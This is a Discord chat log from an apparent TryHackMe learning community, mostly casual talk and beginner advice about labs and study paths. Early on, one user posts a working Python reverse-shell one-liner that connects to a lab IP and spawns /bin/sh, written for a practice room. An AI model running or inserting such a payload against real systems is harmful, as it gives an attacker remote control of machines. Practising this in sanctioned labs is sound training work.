I can't help much with that, haven't done the room myself. Sorry.
#general
topaz sedge
distant robin
I can't use SSH because it requires a password so i have to get information from it using nc and telnet
calm skiff
Did you already try to connect pyrat.thm ?
distant robin
Did you already try to connect pyrat.thm ?
Yes and it's also added to the hosts file too
I connect with telnet no problem but not sure what else I can do with it
calm skiff
So, did you get something when you connect ?
distant robin
So, did you get something when you connect ?
Nope
calm skiff
You have to guess what kind of connection it is
distant robin
a simple one
calm skiff
sorry, what kind of server it is !
distant robin
Python
calm skiff
right, so, if you can execute python code you can get a revshell
distant robin
I'm using this python 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.118.123",8000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
That's why I asked if it should be my VPN IP address or the target machine's IP address because I am not sure if that's even right
calm skiff
You have to use your vpn ip adress : only it can be solved by the target.
the problem is that you are trying to invoke python in a python shell. You juste have to execute the python code
distant robin
Ok my VPN address
calm skiff
BUT, in this room, I think there is some hint in the description
distant robin
BUT, in this room, I think there is some hint in the description
With a cleverly crafted payload, it is possible to gain a shell on the machine that should be my clue
sand trench
anyone wanna help shadow with a project???
distant robin
@calm skiff thank you, I'll try this
twin ridgeBOT
Gave +1 Rep to @calm skiff (current: #3216 - 1)
sand trench
would recommend helping using a virtual machine as you slightly risk breaking your real machine if you do it on actual hardware
systemd sandboxing of default services on a system + docker + ollama + sddm
systemctl list-units --all --state=running
this command lists all running services on your machine
systemd-analyze security serviceName
and this command lists its security score
we are aiming to get as many ok:s ( i.e in the 2.0-4.0 range ) as possible without breaking normal workflow
not gonna post the command to make an override.conf file for a service as you can technically break stuff if you do
west sphinx
@sand trench whyre u smart for
sand trench
you think shadow is smart?? if so you are clearly mistaken
distant robin
@sand trench do you want me to post a screenshot of the above?
sand trench
<@228199546050707456> do you want me to post a screenshot of the above?
well you could post a screenshot of what ever it is you are doing but not sure how it would help immediatly
distant robin
`systemctl list-units --all --state=running`
this command lists all running serv...
I mean of this
sand trench
I mean of this
eeeh if you run that and share a screenshot it would mostly have the same stuff as shadow unless you have installed a lot of specific software
worldly pollen
gm girls
sand trench
oh so you are not from finland after all
distant robin
sand trench
yeah that looks like some default ubuntu or mint distros services
distant robin
yeah that looks like some default ubuntu or mint distros services
Linux Mint Cinnamon
It's on a 2nd SSD so it's separate from my other one
sand trench
Linux Mint Cinnamon
so shadows knowledge of what is usually running on ubuntu based machines was not off.. neato
distant robin
I had to install Cargo for rustscan on it
sand trench
which does not have a service listed in there
can see that you installed docker though
old canopy
i refuse paying for proxifier license
sand trench
i refuse paying for proxifier license
well then good for you
old canopy
Are you an Initex employee by any chance?
brittle kraken
I hate web pentesting so much
sand trench
nope
just happy you are saving money on not buying something shadow has no clue what it is
could shadow look up what proxifier is??? sure
will they do that right now?? probably
old canopy
I hate web pentesting so much
how can i relate to this even though i did minimal web pentesting
old canopy
better off with some free open source thingy for taht
perfect response
now
find me a reliable working secure and good opensource project doing the exact same thing as proxifier
rapid merlin
🖐️😺
old canopy
better off with some free open source thingy for taht
my first thought was exactly what you said 🙂
old canopy
https://search.f-droid.org/?q=proxy&lang=en
windows
sand trench
ah right
sand trench
kinda telling you to do your own research but providing sources for where to find alternatives and info
ripe sleet
https://alternativeto.net/software/proxifier/?platform=windows
<@109022750812694...
How're you Shadow?
sand trench
relaxed and trying to find interesting youtube videos to watch
ripe sleet
relaxed and trying to find interesting youtube videos to watch
Let's gooo
sand trench
while making an offline copy of the scp wiki limited to the first 10k pages that is linked from main page
gusty inlet
Not the place.
mellow copper
is anyone doing the Huntress CTF?
gusty inlet
Last warning, not the place.
ripe sleet
Last warning, not the place.
Hello DKob!! 
sand trench
wow old github looks weird compared today when you are used to how it looks now
old canopy
relaxed and trying to find interesting youtube videos to watch
Eric parker videos mostly interesting
sand trench
Eric parker videos mostly interesting
topics on what???
ah mostly malware stuffs
not super interesting to shadow
old canopy
https://alternativeto.net/software/proxifier/?platform=windows
<@109022750812694...
Cute. Pias5proxy paid proxies with client. Proxycap not able to handle socks5 and not working reliably for application proxification
Ah nvm i think socks 5 was supported
sand trench
¯_(ツ)_/¯
midnight canyon
hi everyone
sand trench
ell gniki
old canopy
it is registered now anyways
strong fjord
To those who've taken SAL1 or PT1, how was it?
distant robin
can see that you installed docker though
Yes I saw that
boreal scarab
Just gonna.........
https://www.hp.com/us-en/shop/pdp/hp-smart-tank-5101-all-in-one-printer
Please, read the title for the printer
boreal scarab
mossy river
ai printer, submit an empty document and it populates for you
old canopy
this has to be sarcasm
sand trench
ai printer, submit an empty document and it populates for you
someone hacks the ai in the printer and it starts printing out full color pages
boreal scarab
"print me a paper of the history of Japan"
worldly pollen
wow old github looks weird compared today when you are used to how it looks now
which browser is this
old canopy
"print me a 1:1 1$ dollar "
sand trench
which browser is this
no clue... it is so old shadow can't recognise it
it is from a 9+ years old video
worldly pollen
it is from a 9+ years old video
this picture from windows xp
distant robin
no clue... it is so old shadow can't recognise it
Looks like Brave?
boreal scarab
Oh no no no
old canopy
Genuinely concerned on why...
boreal scarab
If you don't already hate HP enough.... now would be a great time to pick up that hatred
IT'S NOT EVEN JUST THEIR SMART ONES!
old canopy
If you don't already hate HP enough.... now would be a great time to pick up tha...
whole it department is boycotting them since 10+ years
i dont care because printing is bad for trees and i like trees 🙂
boreal scarab
sand trench
most printers bad
boreal scarab
most printers bad
I quite love my Epson Workforce
I like printing manuals out. I know, I'm horrible.... but I don't go through so much paper like schools do
old canopy
I quite love my Epson Workforce
no joke we got a kyocera printer scanner and its amazing
costwise is not amazing tho
sand trench
heard good things about brother printers but also heard they had some weird change
boreal scarab
sand trench
https://tenor.com/view/cat-breadbox-hiding-leave-me-alone-funny-animals-gif-1440...
cat go box
boreal scarab
cat go box
Cat bread box!
ripe sleet
To those who've taken SAL1 or PT1, how was it?
Look at DKob's review for PT1
strong fjord
Aight
sand trench
meep moops shadow is gonna go for the sleep sloops to the beep boops now
oblique loom
silver sky
YouTube is down and ZenDesk is further being exploited
The irony being I don't have a discord account linked to this email nor have I ever used front gate tickets
mossy river
Someone just messaged me to ask if youTube went down lol
plucky ore
so we back to the old server pic
ripe sleet
meep moops shadow is gonna go for the sleep sloops to the beep boops now
Goodnight Shadow! 
ripe sleet
Someone just messaged me to ask if youTube went down lol
Hello Jabba!
ripe sleet
https://tenor.com/view/cat-crying-cat-cat-meme-cat-crying-meme-crying-cat-meme-g...
Why're you sad Matt? 
leaden olive
Someone just messaged me to ask if youTube went down lol
Idk if it did but I wasn’t able to watch some vids or shorts for 30 mins
winged nimbus
Someone just messaged me to ask if youTube went down lol
we all know you manage google's global cdn
boreal scarab
Ah yes.... US is banned from downloading Windows 11 ISO... but swap my VPN to Canada and it's just fine...
boreal scarab
Why're you sad Matt? <:hanaConfused:985699289042940024>
They're discontinuing my favorite gun 
quaint fossil
good morning guys
cold sparrow
grizzled sky
so i can't go into details for obvious reasons, but i just submitted my first real world bug bounty!;
fringe nacelle
Nice
quaint fossil
hello
marsh lark
hopefully Jabba is asleeeeeeep
dark mason
hopefully Jabba is asleeeeeeep
4:29 AM for him
static smelt
hi
i completed intro to phishing soc sim and it says completed but progress is at 80%
Introduction to Phishing
Soc-sim
Completed
80%
......
sturdy sequoia
i completed intro to phishing soc sim and it says completed but progress is at 8...
grim sparrowBOT
Done!
quick blaze
marsh lark
4:29 AM for him
yup lol
wraith jasper
What is a tool I can use to remove a .zip file from a .png file? An embedded file that is, 7z is not working because it asks for the password for that zip file which is what I need to crack but I do not want to attempt to write a python script at the moment to initiate the command 7z x <image> and then brute force the password from a list, keep track of where it is at in the list, and reinitiate the connection before attempting the next item in the list
?
marsh lark
What is a tool I can use to remove a .zip file from a .png file? An embedded fil...
is this for a tryhackme room, or
wraith jasper
ye
marsh lark
if the zip is in the png
wraith jasper
I figured out the tool, I couldn't remember the name earlier for some reason, binwalk
safe heart
download the zip on main pc
marsh lark
I figured out the tool, I couldn't remember the name earlier for some reason, bi...
ah
yeah, that should work
wraith jasper
download the zip on main pc
if I used unzip it was telling me must use v5.1
Hold on, I'll get correct error msg
need PK compat. v5.1 (can do v4.6)
marsh lark
if I used unzip it was telling me must use v5.1
unzip the png or zip file?
wraith jasper
png
marsh lark
u cant unzip a png
safe heart
check metatdata
wraith jasper
Nothing in metadata
I got this when I used unzip:
Archive: cutie.png
warning [cutie.png]: 34562 extra bytes at beginning or within zipfile
(attempting to process anyway)
skipping: Changed this text.txt need PK compat. v5.1 (can do v4.6)```use binwalk to extract the zip file
then unzip
wraith jasper
Ye, I was just showing what I did prior
rapid merlin
🖐️ 😺
wraith jasper
365 365.zlib 8702.zip success
gray sonnet
@marsh lark what's going on 👀
marsh lark
<@987259301506736149> what's going on 👀
here? rn?
gray sonnet
yes and in general
gray sonnet
Makes sense
marsh lark
learning some AI stuff now
not much difference lol
lol
my life is booooooooooring
marsh lark
hows urs @gray sonnet
marsh lark
Hello Donut! <a:wave:1368841660749975612> <a:wave:1368841660749975612> <a:wave:1...
hiya dark
marsh lark
How're you?
good, u?
sleek hare
Gm
sleek hare
Hai
ripe sleet
Very mad and my head hurts lol
Hello Vainn!
ripe sleet
how are you doing today?
Good
rapid gust
hello my slimes
ripe sleet
hello my slimes
Hello!
ripe sleet
Sadly existing
I hope that your day improves exponentially 
rapid gust
Hello! <a:wave:1368841660749975612> <a:wave:1368841660749975612> <a:wave:1368841...
hello my darkfly slime
ripe sleet
hello my darkfly slime
I'm a slime now?
rapid gust
only if you want to be
ripe sleet
Do I get the powers of the MC in the I was reincarnation as a slime story
rapid gust
no slime rancher i put you in a cage
rapid gust
i believe in u'
ripe sleet
I will free my fellow slimes, and lead them into the formation of a new nation.
rapid gust
do i take this payment program interest free 850 a month
ripe sleet
Congratulationss!!! 🥳 🥳 🥳 🥳
rapid gust
let me look for mine i think i did really well
ripe sleet
😮
rapid gust
awww yeah i did do really well
im doing the educational rooms not the hard hacking rooms so i think its cheating
i themed my ubuntu today
ripe sleet
i themed my ubuntu today
Let's goooo
rapid gust
what do u use dark
ripe sleet
what do u use dark
My main PC currently uses windows 10, but my laptop uses Arch now. Specifically the cachyos that violet put in the chat before
pine bison
We use arch btw.
ngl, i haven't booted my arch for a while. I stuck to windows 11, kali vm for now
rapid gust
My main PC currently uses windows 10, but my laptop uses Arch now. Specifically ...
do u like arch? Im just waiting for a few days off where i can really dive into it
i just did a debloated ubuntu instead as a compromise
ripe sleet
do u like arch? Im just waiting for a few days off where i can really dive into ...
I like pacman as a package manager
It's less keystrokes
Hyprland is kinda fun though
stiff geyser
It means you're a smart pair of pants what else
ripe sleet
If I do move my current PC to linux. I might do KDE plasma as my desktop manager. I mean I'll try installing hyprland, but it's finnicky or so I've heard. If Not I'm gonna switch to kde
rapid gust
i watched mr robot for the first time yesterday he was like "a company exec using KDE🙀 "
ripe sleet
I mean I could do openbox too, but nah
ripe sleet
Cybersecurity
rapid gust
nice
ripe sleet
Yeah
ripe sleet
im so grateful i found cyber
I wish you the best of luck!
sleek hare
Congratulationss!!! <a:Hanapoggies:786187408172777482> <a:Hanapoggies:7861874081...
Is it that easy to go there? I got into gold league in 5 days?
upper umbra
Hello yall also excuse my name😭
rapid gust
no that's impossible
rapid gust
you're lying
silver sky
Morning THM community any reason why vouchers cant be purchased anymore?
rapid gust
gift vouchers?
rapid gust
that's so funny i tried to buy on a couple days ago to gift to someone in here
i have no clue but i wasnt able to either!
sleek hare
you're lying
silver sky
Its 8am somewhere on the planet right
pine bison
Cant post screen shot but yes we cant buy vouchers anymore
verify your thm account on discord
sturdy sequoia
room link?
rapid gust
patch management
marsh lark
Cant post screen shot but yes we cant buy vouchers anymore
not sure why either, hopefully will come back in the future
teal breach
bro w3hats going on bruhhhhhhhh Why vouchers not working anymore this is Insane bro
ripe sleet
I wish all of you a wonderful rest of your night/day. See you
marsh lark
I wish all of you a wonderful rest of your night/day. See you
cya
queen flare
Morning THM community any reason why vouchers cant be purchased anymore?
Ask staff
Maybe they plan to open it back
queen flare
Any staff member you suggest?
Everyone's good but don't dm them on discord. Ask support through the website.
silver sky
Everyone's good but don't dm them on discord. Ask support through the website.
Thanks for the advice brother
twin ridgeBOT
Gave +1 Rep to @queen flare (current: #161 - 60)
rapid gust
give scorpius +1000 rep
blissful frost
queen flare
is tryhackme being slow for u guys
teal breach
is tryhackme being slow for u guys
yes
neat shoal
Is there any legendary pro hacker here who can help me a little?
sturdy sequoia
Is there any legendary pro hacker here who can help me a little?
help with what?
Please don't ask for something illegal
dreamy scaffold
Is there any legendary pro hacker here who can help me a little?
how much are you willing to pay in exchange for da help
-# (nowhere near “a hacker” btw)
neat shoal
help with what?
Location tracking
queen flare
Location tracking
yeah, no one's helping with that. tracking someone's location without consent is illegal.
dreamy scaffold
Guys I recently learned how dark digital forensic is
queen flare
nothing dark about it
rapid gust
i was gonna say XD
dreamy scaffold
Ehh yes there is, the criminal side
neat shoal
My iPhone has gone missing
queen flare
if you're talking about things a dfir person might find when investigating, sure but thats not dfir itself being dark
dreamy scaffold
the cooperate side of it doesn’t involve crime.
pine bison
so what's your point?
sturdy sequoia
My iPhone has gone missing
That sucks
queen flare
My iPhone has gone missing
contact police. we can't find it for you
gray sonnet
My iPhone has gone missing
Okay?
dreamy scaffold
so what's your point?
That he’s referring to DFIR while I was talking about a Forensic Investigator, whose role is versatile. If I were talking about DFIR then would’ve just said that lol
rapid gust
are you a forensic investigator
pine bison
👍
dreamy scaffold
are you a forensic investigator
Not yet
rapid gust
i do a little bit of forensics mainly for phishing emails its prob my fav part of the job
I love DFIR man
You're gonna have a bunch of fun 🙂
marsh lark
long story lol
lol
neat pond
GM yall
slow cloud
mornin
whole rapids
chill
neat pond
Jabba, don't tell me you only slept 4.5 hours
ur like SIEM lol
marsh lark
ur like SIEM lol
LOL
neat pond
fervent rune
hii
i want to start my hacking journey what will be my roadmap and how to start hackin g
marsh lark
i want to start my hacking journey what will be my roadmap and how to start hack...
read #start-here
sturdy sequoia
i want to start my hacking journey what will be my roadmap and how to start hack...
marsh lark
girls?
worldly pollen
hmm thats wierd
marsh lark
hmm thats wierd
what?
fervent rune
try hack me website learning content and labs are free ??
marsh lark
try hack me website learning content and labs are free ??
not completely
around 60% of rooms are free
rapid merlin
try hack me website learning content and labs are free ??
both free and paid
fervent rune
if i want to only use free labs then i can learn complete hacking ?
sturdy sequoia
if i want to only use free labs then i can learn complete hacking ?
youll never learn everything. but its a good place to start
worldly pollen
if i want to only use free labs then i can learn complete hacking ?
probably u cant however you can test youself from labs
fervent rune
ok
marsh lark
it is also key that you probably won't learn everything through one site
while using tryhackme, do your own research
fervent rune
such like i want to hack any website in form of ethical hacking part not any type of harm
then free labs are enough ??
rapid merlin
such like i want to hack any website in form of ethical hacking part not any typ...
Any website + with permission of the owner of the website
fervent rune
ohk
rapid merlin
thats how you call it 'ethical'
fervent rune
you can understand like my website
marsh lark
then free labs are enough ??
imo not really, but it is a good starting place and gets you to intermediate level
fervent rune
and i want to hack it
marsh lark
(better if you can get premium, but free rooms are great too)
marsh lark
and i want to hack it
may I ask where it is hosted?
fervent rune
todays i start offesive security part and when i started it mechine not opening
marsh lark
like is it hosted on aws for example?
marsh lark
like host vercel
I think then you need to also get permission from vercel
because technically they are hosting it
fervent rune
ohk
marsh lark
but this will be very tricky, because you need a contract as well
I'm not exactly sure how it works in this type of scenario, but you will need to get permission from them
marsh lark
you gotta /verify
sharp citrusBOT
fervent rune
ohh
sturdy sequoia
but i'm not able to it
did you read #start-here ?
marsh lark
did you read <#806554132117979143> ?
-# oh yeah, it is literally in there LOL
sturdy sequoia
Have a look around. Try it out.
sturdy sequoia
It's pretty basic. I'm not going to guide you through it step by step
marsh lark
I'll just give you some pointers and you test it out
rapid merlin
and which rooms
Pre security path then cyber security 101 is good to start
marsh lark
- the "Roadmap" section contains the roadmap (which also includes premium rooms), which you can follow if you want to
- Modules are groups of rooms that are about a specific topic
- Walkthroughs are rooms that teach you something, which you can sort by newest, etc.
- Challenge rooms (which you can find my clicking Practice) are rooms you can test your skills on
fervent rune
1. the "Roadmap" section contains the roadmap (which also includes premium rooms...
thnks brother
fringe nacelle
rapid merlin
topaz sedge
HTB
sturdy sequoia
Thm is more beginner friendly
topaz sedge
THM is for beginners but after some foundation building, go to HTB
HTB gives you a more realistic idea as to how real life pentesting is like
marsh lark
I'd recommend starting with THM
fervent rune
htb rooms are free ??
fringe nacelle
HTB is for when you actually know how to do stuff without guidance.
fringe nacelle
htb rooms are free ??
Nope
fervent rune
ohh
marsh lark
htb rooms are free ??
to some extent yes, you get the same amount of cubes as the amount you used to start a room
topaz sedge
HTB is for when you actually know how to do stuff without guidance.
well if you do retired machines in HTB, you can do with guidance
you have write ups
fervent rune
i think htb is advance version of thm
topaz sedge
and video walk throughs
fringe nacelle
well if you do retired machines in HTB, you can do with guidance
You need to pay for that iirc
marsh lark
i think htb is advance version of thm
kinda?
topaz sedge
You need to pay for that iirc
oh well yea
fringe nacelle
He asked free lol
marsh lark
learning is academy, no?
topaz sedge
i have VIP+ in HTB so i just solve both retired and active machines
marsh lark
i have VIP+ in HTB so i just solve both retired and active machines
-# wow
topaz sedge
learning is academy, no?
yes
fervent rune
ohk
fringe nacelle
learning is academy, no?
Wdym? Their learning platform?
marsh lark
Wdym? Their learning platform?
yes
stiff geyser
to some extent yes, you get the same amount of cubes as the amount you used to s...
No you dont you get some cubes but not all you used to unlock the module
marsh lark
academy also requires a subscription
-# luckily I'm a student
topaz sedge
Wdym? Their learning platform?
they have 2 platforms
htb labs and htb academy
labs is only machines
academy is learning material
fringe nacelle
they have 2 platforms
htb labs and htb academy
Kratos I talk to you in the HTB server
I know homie
marsh lark
No you dont you get some cubes but not all you used to unlock the module
some modules give back the same amount of cubes when you finish it as the same amount as you used
fringe nacelle
Wassup lol I just lurk here
topaz sedge
how you doing
fervent rune
anyone know about how to do real life hacking like i want to crack a password then you all are able to do ?
fringe nacelle
Finishing up work so bored at the moment.
stiff geyser
some modules give back the same amount of cubes when you finish it as the same a...
Maybe a couple but its mostly like a one fifth of the cubes used
topaz sedge
and tired
marsh lark
anyone know about how to do real life hacking like i want to crack a password th...
not necessarily, no
marsh lark
Maybe a couple but its mostly like a one fifth of the cubes used
most of the time, yeah
sturdy sequoia
anyone know about how to do real life hacking like i want to crack a password th...
is it to an account you own on a service you own?
topaz sedge
anyone know about how to do real life hacking like i want to crack a password th...
these platforms teach you just that
fervent rune
yeah
i want to exp on my paltform
not any extrenal website or 3rd party applications
topaz sedge
start with THM
build a foundation
move over to HTB
fringe nacelle
@marsh lark the best way to abuse academy is through their student plan. You can get tier 1-2 modules free (Yes they give you cubes when you complete them) so you can accumulate a stockpile of cubes for some of the higher tier content, but obviously it won't last long.
marsh lark
<@987259301506736149> the best way to abuse academy is through their student pla...
-# I know
fringe nacelle
marsh lark
luckily, I'm a student for like 8 more years
marsh lark
I'm curious on how long student emails even last for.
4 years maybe
slow cloud
oh lawd
marsh lark
I just started high school, so
topaz sedge
bro is going to type a promotion message
pine bison
No you dont you get some cubes but not all you used to unlock the module
unless you have a student plan. everything is cube free
marsh lark
unless you have a student plan. everything is cube free
until tier II anyway
pine bison
But for beginners, thm is very super duper friendly
fringe nacelle
Ermah gawd is that a hot chick? 😻
I'll surely fall for your invite ms.mcc27jq9m01l8s7 what a lovely name 😻
slow cloud
for beginners i can recomend thm
pine bison
yes.
marsh lark
But for beginners, thm is very super duper friendly
if I started with HTB, I wouldn't understand ANYTHING lol
pine bison
if I started with HTB, I wouldn't understand ANYTHING lol
LEGIT HAHAHAHA
its too text heavy
fringe nacelle
Ngl I stopped at this level on thm and jumped to HTB
pine bison
I started htb after finishing jr pt and some portswigger module/ labs
fringe nacelle
Ooooo nice
pine bison
also PicoCTF challenges are very good
fringe nacelle
This month is my last month of college, so I can finally do more with my time 
marsh lark
Ngl I stopped at this level on thm and jumped to HTB
ngl, someone is gonna give me a HTB 25 dollar gift card
soon, hopefully
fringe nacelle
ngl, someone is gonna give me a HTB 25 dollar gift card
Dope, abuse it to the best of your abilities lol
marsh lark
which I can use my student email to get what 3 months LOL
fringe nacelle
If you ever need box guidance check out ippsec it's either 1 p or 2
But you'll be fine
rapid merlin
would thm’s red team path alone train me to OSCP
stiff geyser
unless you have a student plan. everything is cube free
What do you mean cube free like if you pay up front 1000s or more euros or dollars
marsh lark
What do you mean cube free like if you pay up front 1000s or more euros or dolla...
this is a problem tho ngl
with HTB
too expensive
THM is perfect price
rapid merlin
altho, I'm sticking with THM
honestly thm tought me lot im nearly done w pt1
marsh lark
honestly thm tought me lot im nearly done w pt1
yup
pine bison
What do you mean cube free like if you pay up front 1000s or more euros or dolla...
$8/month and you get this. You don't need cubes. You'll need cubes for tier III modules up. For THM you get everything.
plush needle
You have not fully advertised any other discord yet, but has a heads up, please do not do so as this might get you removed from the server 🙏
stiff geyser
would thm’s red team path alone train me to OSCP
No i dont think so
sturdy sequoia
You have not fully advertised any other discord yet, but has a heads up, please ...
they had multiple accounts banned earlier today
marsh lark
they had multiple accounts banned earlier today
really?
topaz sedge
did it
stiff geyser
$8/month and you get this. You don't need cubes. You'll need cubes for tier III ...
Well yeah what about when you need tier 3 modules or you arent a student
plush needle
they had multiple accounts banned earlier today
Can you DM me about it please? Not fully aware of it
pine bison
Well yeah what about when you need tier 3 modules or you arent a student
That's why i prefaced it with "Unless you have a student email"
marsh lark
Well yeah what about when you need tier 3 modules or you arent a student
thats why HTB is too pricy
topaz sedge
now i want to sleep
stiff geyser
thats why HTB is too pricy
It really is too much
marsh lark
It really is too much
bruh, gold annual is 1260/year but doesn't even give FULL access
-# altho they do give exam vouchers per year
but even the monthly ones, goodness
stiff geyser
But i guess it isnt if a company is paying for you or youre in the industry and rich
marsh lark
THM give access to all rooms for WAY less
stiff geyser
Yeah and you have to complete the full path for the exam
marsh lark
Yeah and you have to complete the full path for the exam
yup
brazen crane
Hey everyone hope all is good, is anyone else having issues with the Osquery room? I have 2 questions that won't mark as correct when I know the answer is correct
marsh lark
Hey everyone hope all is good, is anyone else having issues with the Osquery roo...
try asking in #room-help
brazen crane
try asking in <#522158539129618453>
That I will, didn't think it would be too bad to ask here as well
fringe nacelle
Ngl the only thing I like from THM is the Christmas event they do for 30ish days. Can't remember the name
marsh lark
Ngl the only thing I like from THM is the Christmas event they do for 30ish days...
Advent of Cyber
fringe nacelle
Yee
marsh lark
me excited for both AoC and AoC LOL
brazen crane
Has there been sites maintenance, have encountered several issues from losing room points to a demotion from diamond to bronze than back to diamond missing all points?
marsh lark
Has there been sites maintenance, have encountered several issues from losing ro...
yeah, hopefully they are all fixed soon
we want less bugs lol
brazen crane
Ah OK probably explains the room bug as well
neat pond
he just search for easy rooms to get more XPs damn mann
5840 he just wanna be the best at Xp not at cybersecurity
but he is at Ruby league lol
brazen crane
Fight fight fight lol
grim widget
5840 he just wanna be the best at Xp not at cybersecurity
why are you trying to shame him for being dedicated?
marsh lark
why are you trying to shame him for being dedicated?
5000 xp is possible, but in many cases means they are cheating
you can also check their room history and see in some cases (had someone solving multiple easy rooms in 2-3 minutes each)
neat pond
why are you trying to shame him for being dedicated?
no brother not for that i just wondering why
neat pond
you can also check their room history and see in some cases (had someone solving...
that what i mean
thanks for explaining @marsh lark
twin ridgeBOT
Gave +1 Rep to @marsh lark (current: #28 - 390)
marsh lark
thanks for explaining <@987259301506736149>
no problem 🙂
neat pond
why are you trying to shame him for being dedicated?
are u him dude Lol
fringe nacelle
Does thm even ban cheaters
marsh lark
Does thm even ban cheaters <:Hmmmm:919188745553592341>
they do
they just leave the account but doesn't make them accessible in any way
fringe nacelle
That's nice atleast
neat pond
Does thm even ban cheaters <:Hmmmm:919188745553592341>
everywhere there is even in CS2 go lol %80 of them
neat pond
They've been a thing since the first game was made lol
they know the game better then VAC there lmoa or the cs2 developers
tired wolf
bruh, gold annual is 1260/year but doesn't even give FULL access
different target audience
tired wolf
i’ve known internships that offer htb subscriptions
marsh lark
that is true
tired wolf
hell, one place even offered oscp
tired wolf
benefits them, if anything
marsh lark
true
tired wolf
the intern would continue working with them
and the certificate really just proves his worth
marsh lark
and become a full-time employee in the future?
tired wolf
yeah
marsh lark
-# THM, hire me
tiny wraith
Hey guys I've completed all google cybersecurity certs now wondering how to move forward
Offensive?
tired wolf
up to you
tired wolf
up to you
tiny wraith
If you were in my place
tiny wraith
Okay
But if I want to be in offensive
Like what should I really do now like what the next step on ladder
tired wolf
rate your current mastery in offensive security
tired wolf
Like what should I really do now like what the next step on ladder
that ladder does not exist my friend
tiny wraith
Haha
tired wolf
rate your current mastery in offensive security
^
north steeple
hello guys
sturdy sequoia
Should I do try hack me ? And networkings and portswigger and all
yep, all are good steps
marsh lark
if your end goal is bug bounties
-# imo it shouldn't be in the first place
tiny wraith
I wanna land job
tired wolf
-# imo it shouldn't be in the first place
yeah
fringe nacelle
hell, one place even offered oscp
An internship I applied for offered SANS the $10k certs
marsh lark
An internship I applied for offered SANS the $10k certs
goodness
fringe nacelle
Shit is insane lol
tiny wraith
Like I have linkedin too I have google certs too i
north steeple
An internship I applied for offered SANS the $10k certs
where??
tired wolf
An internship I applied for offered SANS the $10k certs
im interested in whether you got offered the place
fringe nacelle
im interested in whether you got offered the place
Nope, but had a 2 hour lunch interview with them. I learned a lot especially with how my city is adapting CyberSecurity and IT.
tired wolf
either aussie or florida
north steeple
The land of gators
??
fringe nacelle
Florida
frozen gull
jagged igloo
no gif perms 💔
sturdy sequoia
no gif perms 💔
You need to verify your account first
sharp citrusBOT
marsh lark
@gusty inlet you ready for one more?
marsh lark
https://tenor.com/view/djkhaled-another-one-anotherone-gif-4905376
yessir
dreamy scaffold
I love DFIR man
I feel you 🤝
At my induction two lecturers gave us a brief insight on their pedagogy, so they chose a task that involved analysing an email of a CEO. I think the salary data sheet was leaked to their competitor.
It was fuun ngl
ashen cape
Finally!
marsh lark
the first guy is 12648 points
seems like a cheater, you can email tryhackme
sharp citrusBOT
TryHackMe Socials
marsh lark
be very specific tho
like which week it was, what league, what their username is, etc.
@mossy river does Vmware normally use more storage when it is running?
cuz when it isn't running, it seems to be at around 20+ GB, but now it is almost 40 GB
winged nimbus
the first guy is 12648 points
they are most likely cheating
zealous shell
What's the next league after ruby? I wanna see how it looks like
marsh lark
What's the next league after ruby? I wanna see how it looks like
diamond I believe
rotund summit
What's the next league after ruby? I wanna see how it looks like
Open the badges list, you'll see what it looks like
rotund summit
they are most likely cheating
I'm afraid to report him and wrong him he might not be a cheater
marsh lark
I'm afraid to report him and wrong him he might not be a cheater
still best to email tryhackme
winged nimbus
I'm afraid to report him and wrong him he might not be a cheater
report them
winged nimbus
I'm afraid to report him and wrong him he might not be a cheater
getting that amount of points in less than a week is not possible for a human without cheating
rotund summit
getting that amount of points in less than a week is not possible for a human wi...
The highest points I've ever reached in my life were 5k in a week But 12,000 is a lot, honestly
marsh lark
The highest points I've ever reached in my life were 5k in a week But 12,000 is ...
-# so email (basically reporting)
tired wolf
<@270975958511517697> does Vmware normally use more storage when it is running?
thin disk?
rotund summit
-# so email (basically reporting)
ok thx\
twin ridgeBOT
Gave +1 Rep to @marsh lark (current: #28 - 391)
zealous shell
for cheating
Does their account gets banned or gets banned from the leagues
tired wolf
nah, just wondering
you misunderstood
marsh lark
Does their account gets banned or gets banned from the leagues
their account gets banned
winged nimbus
The highest points I've ever reached in my life were 5k in a week But 12,000 is ...
12k points in like 3 days
marsh lark
how is the virtual machine configured
ah
tired wolf
or dynamic
marsh lark
or dynamic
I believe it is dynamically allocated, one sec
yup, so just shut down the machine
and it went from 39GB to 23GB
the size of the folder containing the VM I mean
rotund summit
12k points in like 3 days
yeah he might be a cheater
tall kiln
What does this mean ?
tall kiln
you have 50%xp
Use of it ?
rotund summit
Use of it ?
I think it makes the points increase more, but only for 30 min
marsh lark
@gusty inlet ready
gusty inlet
the first guy is 12648 points
DM username pls.
rotund summit
report them
lol he is 14140 points know
marsh lark
lol he is 14140 points know <:kekw:658061932577816606>
yup, cheating lol
winged nimbus
<@538468652630933505> ready
rip i can't join i got a morning class in 9 hours
i could join but i should get sleep
marsh lark
rip i can't join i got a morning class in 9 hours
ahh, then sleep
winged nimbus
ahh, then sleep
its an online class so i don't have to wake up in 7 hours
marsh lark
its an online class so i don't have to wake up in 7 hours
assuming this is a hard room, this event might be 1.5-2 hours long
winged nimbus
assuming this is a hard room, this event might be 1.5-2 hours long
what is the subject
winged nimbus
is it red or blue
marsh lark
red
winged nimbus
alr
marsh lark
AD
rose bone
sup
marsh lark
@mossy river @gusty inlet the trio LOL
winged nimbus
DKob is solving a hard room in thm
i am not at the skill level of hard rooms in red team so ill be fine missing it
marsh lark
i am not at the skill level of hard rooms in red team so ill be fine missing it
luckily they record, so
rose bone
sup
queen flare
What does this mean ?
this is kind of useless unless you speedrun a room hampering real learning
rapid merlin
https://discord.gg/qH3unSjv?event=1427686350249000994
Is this live ?
mossy river
Is this live ?
Yes!
rapid merlin
I lose connection
steel aspen
Entire distro got corrupted, guess I'm dumb for going straight to an advanced distro, and lost most of my files. Lucky I had some backed up. Mint Cinnamon for me now hahah. Feels like a different distro so far though. But I get to go through the process of downloading and installing all the tools manually and probably doing some configuration.
green zealot
Guys, how can I learn topics like tracing and findings
sturdy sequoia
tracing and finding what?
rapid merlin
Guys, how can I learn topics like tracing and findings
You mean osint?
information gathering niches
slow cloud
Guys, how can I learn topics like tracing and findings
Crypto tracing?
Vulnerability finding
Its quite vague
queen flare
data centers in india are subjected to a law, by which they are forced to keep logs along with user information for 5 years at least, and the government can ask for those logs anytime.
if the data center is located in mumbai, i assume tryhackme would do the same?
mossy river
